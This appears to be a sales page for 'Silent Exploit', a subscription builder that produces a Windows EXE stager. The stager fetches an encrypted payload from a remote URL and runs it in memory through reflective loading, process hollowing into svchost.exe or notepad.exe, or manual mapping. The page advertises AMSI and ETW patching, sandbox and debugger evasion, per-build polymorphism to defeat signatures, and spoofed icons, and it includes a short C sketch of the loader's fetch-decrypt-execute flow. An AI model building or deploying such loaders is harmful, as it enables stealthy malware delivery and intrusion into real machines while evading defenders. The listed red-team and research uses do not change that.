Terminal LogoSilent Exploit
Exploit Builder BuilderLauncher Module
Exploit Builder/ Launchers/ EXE Launcher
EXE
Native PE Loader · Stager

EXE Launcher.

PE Loader · .exe

A native Windows PE loader that fetches a hosted payload and executes it in memory using reflective loading or process hollowing — no payload bytes ever touch disk. Includes anti-analysis, AMSI/ETW evasion primitives, and per-build polymorphism for a fresh static fingerprint every time.

In-memory exec
No Disk Drop
x86 / x64
Architectures
Reflective + Hollow
Load Modes
AMSI / ETW
Evasion
Overview

What is the EXE Launcher?

The EXE Launcher produces a native Windows executable whose only job is to fetch a remote PE payload (your real implant/tool) and run it without writing it to disk. Three primary loader strategies are available: reflective PE loading in the launcher's own process, process hollowing into a benign suspended child (e.g., svchost.exe), or manual mapping with custom IAT/relocation handling.

  • Single-EXE artifact — small (under 200 KB), self-contained loader
  • HTTPS payload fetch with optional hardcoded TLS pinning
  • Per-build polymorphism — junk imports, control-flow, and string-XOR rotated each compile
  • Optional anti-analysis: hostname filter, mouse activity, sleep skewing, debugger checks
Execution Flow

How the launcher works.

STEP 01

Provide URL

HTTPS endpoint serving your encrypted PE payload.

STEP 02

Pick Load Strategy

Reflective load · Process hollowing target · Manual map.

STEP 03

Configure Evasion

AMSI patching, ETW patching, sleep encryption, anti-debug, hostname filter.

STEP 04

Build EXE

Output: x86 or x64 native PE with custom icon & metadata.

Technical Details

Under the hood.

Reflective PE Loading

Allocates RWX/RW+RX memory, copies sections per the PE headers, fixes relocations, resolves IAT, calls TLS callbacks, then jumps to the entrypoint. All in-process.

Process Hollowing

Spawns a benign child (svchost.exe, RegAsm.exe, notepad.exe) suspended, unmaps its image, writes payload sections, fixes context, and resumes. Payload runs under a trusted PID.

Manual Mapping

Like reflective load, but performed against a remote process; no LoadLibrary footprint. Used when the payload is a DLL rather than an EXE.

AMSI & ETW Patching

Optional in-process patches against AmsiScanBuffer and EtwEventWrite to disable those telemetry surfaces for the loaded payload.

Encrypted Networking

Per-build symmetric key (AES-128/256) used to decrypt the fetched payload. URL is XOR-encoded in the binary; resolved at runtime.

Per-Build Polymorphism

Junk imports, randomized opaque control flow, string XOR keys, section name shuffling, and PE checksum re-computation. Two builds share no static SHA.

loader.c · simplified reflective entry
int main(void) {
    if (IsSandbox()) return 0;
    PatchAMSI(); PatchETW();
    BYTE* buf = Fetch(Dec(URL_ENC, KEY));
    AesDecrypt(buf, len, KEY);
    ReflectiveLoad(buf);   // jumps to payload OEP
    return 0;
}
Specifications

Module specs.

Output FormatNative Windows PE (.exe)
Delivery ModeURL only — payload fetched over HTTPS at runtime. No local-embed mode.
Architecturesx86 · x64
OS CompatibilityWindows 7 / 8.1 / 10 / 11
Load StrategiesReflective PE · Process Hollowing · Manual Mapping
Hollow Targetssvchost.exe · RegAsm.exe · notepad.exe · msbuild.exe
EvasionAMSI patch · ETW patch · Sleep encryption · Anti-debug · Hostname filter
NetworkingHTTPS fetch · Per-build AES key · Optional TLS pinning
PolymorphismImports · Control flow · String XOR · Section names · Checksum
Visual SpoofCustom icon & version-info; common-app cloning options
Use Cases

When to use the EXE launcher.

🔎

EDR Validation

Test reflective load, hollowing, and AMSI/ETW patching telemetry across modern EDR products.

🎯

Red Team Stage 1

Use as a tiny first-stage that fetches the larger implant only when targeting succeeds.

🧪

Sandbox Evasion R&D

Measure how varied sandboxes handle anti-analysis primitives, sleep encryption, and hostname filters.

Loader Comparison

Benchmark reflective vs hollowing vs manual-map performance and detection across the same target.

🛡

Defensive Research

Study real loader internals so detections match real-world adversary tradecraft.

🔄

Multi-Stage Chain

Drop from any Exploit Builder builder (LNK, MSC, CPL, CHM, Macro) as the final native-code stage.

Pricing

EXE Launcher plans.

All tiers include unlimited builds (x86 + x64), every load strategy, full polymorphism + evasion, and updates within the term.

1 Month
3 Months
6 Months
12 Months

Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.

Other Modules

Explore the full suite.

Ready to ship?

Pick a tier above or talk to us — we'll match the right configuration to your engagement.